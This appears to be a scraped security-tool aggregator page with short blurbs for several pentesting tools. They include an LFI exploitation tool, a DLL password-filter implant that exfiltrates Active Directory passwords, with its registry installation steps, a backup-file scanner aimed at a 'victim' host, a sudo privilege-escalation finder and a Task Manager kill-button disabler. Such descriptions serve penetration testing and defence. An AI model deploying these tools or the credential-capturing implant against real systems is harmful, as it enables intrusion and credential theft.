image
Miami, February 19, 2020 – Faraday is opening 2020 by strengthening their releases using the featured cybersecurity worldwide events calendar, starting next week with BSides and RSAC in San Francisco. As a Blackhat Global Partner, the company will also participate as a sponsor in all BH’s global events. By means of automation technology and workflow intelligence, Faraday Platform helps teams reduce their vulnerability findings’ life cycle by prioritizing actions and decreasing the exposure time of their assets while managing their own Security Ecosystem. Duplicate Vulnerability Detection, Agents with Process Scheduler and the new Cloud implementation are some of the latest enhancements focused on automating every phase of the Vulnerability Management process, thus increasing team’s maturity and risk mitigation. “We believe that understanding your security posture is the main key to making smarter security investments” From February 24 to 28 , Faraday team will be available to schedule executive meetings around BSides and/or RSA conferences in San Francisco , talk about Vulnerability Management Automation and how their technology can help you. For all those interested in growing their business by including Faraday into their portfolio, this will also be a possibility to approach their new P artner Program designed to adapt to different strategies and business levels. About Faraday Faraday's mission is to help companies perform Vulnerability Management by…

Source

image
This software is a subdomain enumeration tool. Purpose dnssearch takes an input domain ( -domain parameter ) and a wordlist ( -wordlist parameter ), it will then perform concurrent DNS requests using the lines of the wordlist as sub domains eventually bruteforcing every sub domain available on the top level domain. It supports a custom file extension ( -ext , default to php ) and other optional arguments: Usage of ./dnssearch: -consumers int Number of concurrent consumers. (default 8) -domain string Base domain to start [enumeration](<https://www.kitploit.com/search/label/Enumeration> "enumeration" ) from. -wordlist string [Wordlist](<https://www.kitploit.com/search/label/Wordlist> "Wordlist" ) file to use for enumeration. (default "names.txt") -a bool Lookup A records ( default true ) -txt bool Lookup TXT records ( default false ) -cname bool Show CNAME results ( default false ) Compilation go get github.com/evilsocket/dnssearch cd dnssearch go build -o dnssearch main.go Compilation and use with Docker docker build -t dnssearch . docker run -it –rm dnssearch License This project is copyleft of Simone Margaritelli and released under the GPL 3 license. Download…

Source

image
LFI Exploitation tool A little python tool to perform Local file inclusion. Liffy v2.0 is the improved version of liffy which was originally created by rotlogix/liffy . The latter is no longer available and the former hasn't seen any development for a long time. Main feature data:// for code execution expect:// for code execution input:// for code execution filter:// for arbitrary file reads /proc/self/environ for code execution in CGI mode Apache access.log poisoning Linux auth.log SSH poisoning Direct payload delivery with no stager Support for absolute and relative path traversal Support for cookies for authentication Documentation Installation Usage Contribution Suggest a feature Like any other technique to exploit LFI Report a bug Fix something and open a pull request In any case feel free to open an issue Credits All the exploitation techniques are taken from liffy Logo for this project is taken from renderforest Support If you'd like you can buy me some coffee: Download…

Source

image
DLLPasswordFilterImplant is a custom password filter DLL that allows the capture of a user's credentials. Each password change event on a domain will trigger the registered DLL in order to exfiltrate the username and new password value prior successfully changing it in the Active Directory (AD). For more information about password filters consult Microsoft's documentation . Installing To install the password filter on a system: Create the DLL for the targeted architecture. Compile in 32-bit for a 32-bit system and in 64-bit for a 64-bit system. Copy the DLL to the Windows installation directory. (Default folder: WindowsSystem32) Register the password filter by updating the following registry key: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa If the Notification Packages subkey exists, add the name of the DLL ("DLLPasswordFilterImplant" if you didn't rename it) to the existing value data. Do not overwrite the existing values. If the subkey does not exist, create it and add the name of the DLL ("DLLPasswordFilterImplant" if you didn't rename it) to the value data. NOTE: Do not include the .dll extension when adding the name of the DLL in the Notification Packages subkey. Configure the public key to use for encrypting credentials. KEY=key.pem Generate an RSA key and dump its public key. Keep the private key around for decryption openssl genrsa -out $KEY 2048 Prepare the Windows registry key entry. echo ‘Windows Registry…

Source

image
ohmybackup – Scan Victim's Backup Directories & Backup Files ohmybackup Scans backup folders on target sites. Searches archived files in the folders it finds. With the 2-file scanning system, it adds extensions and filenames in different ways, making it more likely to be found. 1 – files/extensions.txt – This adds new extensions to the file, for example: by adding in the form of .example allows you to retry all the possibilities tried in the new extensions. 2 – files/files.txt – It can scan these folders according to the extensions you added, by giving them new file names. 3 – files/folders.txt – Recursively scans the specified folders. You can add to this list yourself. Installation go run ohmybackup.go –hostname victim.host or go build ohmybackup.go Run ./ohmybackup –hostname victim.host Download…

Source

image
This project inspects Java libraries and classpaths for gadget chains. Gadgets chains are used to construct exploits for deserialization vulnerabilities. By automatically discovering possible gadgets chains in an application's classpath penetration testers can quickly construct exploits and application security engineers can assess the impact of a deserialization vulnerability and prioritize its remediation. This project was presented at Black Hat USA 2018. Learn more about it there! (Links pending) DISCLAIMER: This project is alpha at best. It needs tests and documentation added. Feel free to help by adding either! Building Assuming you have a JDK installed on your system, you should be able to just run ./gradlew shadowJar . You can then run the application with java -jar build/libs/gadget-inspector-all.jar <args> . How to Use This application expects as argument(s) either a path to a war file (in which case the war will be exploded and all of its classes and libraries used as a classpath) or else any number of jars. Note that the analysis can be memory intensive (and so far gadget inspector has not been optimized at all to be less memory greedy). For small libraries you probably want to allocate at least 2GB of heap size (i.e. with the -Xmx2G flag). For larger applications you will want to use as much memory as you can spare. The toolkit will go through several stages of classpath inspection to build up datasets for use in later stages. These…

Source

image
It's an information security audit tool that creates intelligent wordlists based on the content of the target page. Help us See some calculations used Install Need to: Python3.6 , Bash (GNU Bourne-Again SHell) Optional: Git , Groff git clone https://github.com/owasp/D4N155.git cd D4N155 pip3 install -r requirements.txt bash main Or whithout git wget -qO- https://github.com/owasp/D4N155/archive/master.zip | bsdtar -xf- cd D4N155-master pip3 install -r requirements.txt bash main Manual D4N155: Tool for smart audit security Usage: bash main <option> <value> All options are optionals Options: -w, –wordlist <url|ip> Make the smartwordlist based in informations on website. -t, –targets <file> Make the smart-wordlist based in your passed source informations in urls. -b, –based <file> Analyze texts to generate the custom wordlist -r, –rate <time> Defines time interval between requests -o, –output <file> For to store the all wordlist. -?a, –aggressive Aggressive reading with headless -h, –help Show this mensage. Value: <url | ip | source | file | time> URL URL target, example: scanme.nmap.org IP IP address TIME Time, example: 2.5. I.e: 00:00:02:30.. 0 are default FILE File, for save the result, get urls or using in wordlist Download…

Source

image
Simple way to disable/rename buttons from a task manager. Installation git clone https://github.com/Mrakovic-ORG/TaskManager-Button-Disabler cd TaskManager-Button-DisablerTaskManager Button Disabler dotnet build Features Rename kill proccess button Disable kill proccess button Works in TaskMgr, ProcessHacker etc… Download…

Source

image
Linux Privilege Escalation through SUDO abuse. If you like the tool and for my personal motivation so as to develop other tools please a +1 star * The tool can be used by pentesters, system admins, CTF players, students, System Auditors and trolls :). INTRO WARNING: SUDO_KILLER is part of the KILLER project. SUDO_KILLER is still under development and there might be some issues, please create an issue if you found any. Other tool will be added to the KILLER project in the coming months so stay tuned up. Also ideas, bug reports, contributions are more than welcome ! Stay tuned : Follow me on twitter @ https://twitter.com/TH3xACE Overview SUDO_KILLER _ is a tool that can be used for privilege escalation on linux environment by abusing SUDO in several ways. The tool helps to identify misconfiguration within sudo rules, vulnerability within the version of sudo being used (CVEs and vulns) and the use of dangerous binary, all of these could be abused to elevate privilege to ROOT. SUDO_KILLER _ will then provide a list of commands or local exploits which could be exploited to elevate privilege. It is worth noting that the tool does not perform any exploitation on your behalf, the exploitation will need to be performed manually and this is intended. Features Some of the checks/functionalities that are performed by the tool. Misconfigurations Dangerous Binaries Vulnerable versions of sudo – CVEs Dangerous Environment…

Source

image
Adama Searches For Threat Hunting and Security Analytics A collection of known log and / or event data searches for threat hunting and detection. They enumerate sets of searches used across many different data pipelines. Implementation details are for ELK. Adama is part of the SpaceCake project which is a set of hunts, searches, alerts, visualizations and data pipelines for for intrusion detection, security analytics and threat hunting using F/OSS (free and open source) tools Download…

Source